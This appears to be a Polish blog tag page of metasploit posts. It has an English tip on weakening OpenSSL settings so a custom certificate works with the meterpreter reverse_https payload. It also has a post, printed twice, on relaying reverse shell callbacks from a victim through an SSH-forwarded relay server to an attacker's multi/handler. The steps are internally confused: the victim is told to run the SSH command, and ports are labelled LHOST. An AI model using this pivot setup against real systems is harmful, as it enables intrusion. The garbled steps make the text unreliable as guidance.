If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.
in /etc/ssl/openssl.cnf
from
CipherString=DEFAULT@SECLEVEL=2
to
CipherString=DEFAULT
Pokazywanie postów oznaczonych etykietą metasploit. Pokaż wszystkie posty
Pokazywanie postów oznaczonych etykietą metasploit. Pokaż wszystkie posty
środa, 30 stycznia 2019
wtorek, 29 stycznia 2019
Przekazywanie portu w Linux np. dla Metasploit
Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący
W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH
W tym celu na komputerze B dodać:
do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd
Na komputerze A wykonać polecenie:
ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b
Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444
Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący
W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH
W tym celu na komputerze B dodać:
do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd
Na komputerze A wykonać polecenie:
ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b
Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444
Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888
Subskrybuj:
Posty (Atom)